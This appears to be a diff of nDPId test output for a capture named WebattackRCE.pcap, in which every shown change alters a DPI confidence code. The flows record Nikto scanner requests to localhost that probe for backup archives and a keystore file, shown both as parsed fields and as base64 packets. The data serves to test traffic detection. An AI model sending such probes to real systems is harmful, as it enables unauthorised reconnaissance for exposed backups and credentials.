-01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":1576420277187,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277187,"pkt":"AAAAAAAAAAAAAAAACABFAADEwZ1AAEAGepR\/AAABfwAAAcQMH5B2JfkLbDSLWoAYAED+uAAAAQEICp1m\/OudZvzrR0VUIC8xMjcudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":1576420277189,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277189,"pkt":"AAAAAAAAAAAAAAAACABFAADAxaRAAEAGdpF\/AAABfwAAAcQOH5BgW\/00es\/TMYAYAED+tAAAAQEICp1m\/O2dZvztR0VUIC8xMjcwLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":1,"flow_last_seen":1576420277190,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277190,"pkt":"AAAAAAAAAAAAAAAACABFAADACFhAAEAGM95\/AAABfwAAAcQQH5AQPjDI+venWYAYAED+tAAAAQEICp1m\/O6dZvzuR0VUIC8xMjcwLmFseiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":1,"flow_last_seen":1576420277193,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277193,"pkt":"AAAAAAAAAAAAAAAACABFAAC9hYJAAEAGtrZ\/AAABfwAAAcQSH5Cznr0TB99xxoAYAED+sQAAAQEICp1m\/PGdZvzwR0VUIC8wLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":1,"flow_last_seen":1576420277194,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277194,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JiRAAEAGFhV\/AAABfwAAAcQUH5CXxR6x507sMoAYAED+sQAAAQEICp1m\/PKdZvzyR0VUIC8wLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":1,"flow_last_seen":1576420277196,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277196,"pkt":"AAAAAAAAAAAAAAAACABFAADASbJAAEAG8oN\/AAABfwAAAcQWH5DgxXEkcLyXoIAYAED+tAAAAQEICp1m\/PSdZvz0R0VUIC8xMjcwLnRneiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":1576420277198,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277198,"pkt":"AAAAAAAAAAAAAAAACABFAADAjLtAAEAGr3p\/AAABfwAAAcQYH5DOSLQrVcLjaIAYAED+tAAAAQEICp1m\/PadZvz2R0VUIC8xMjcwLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
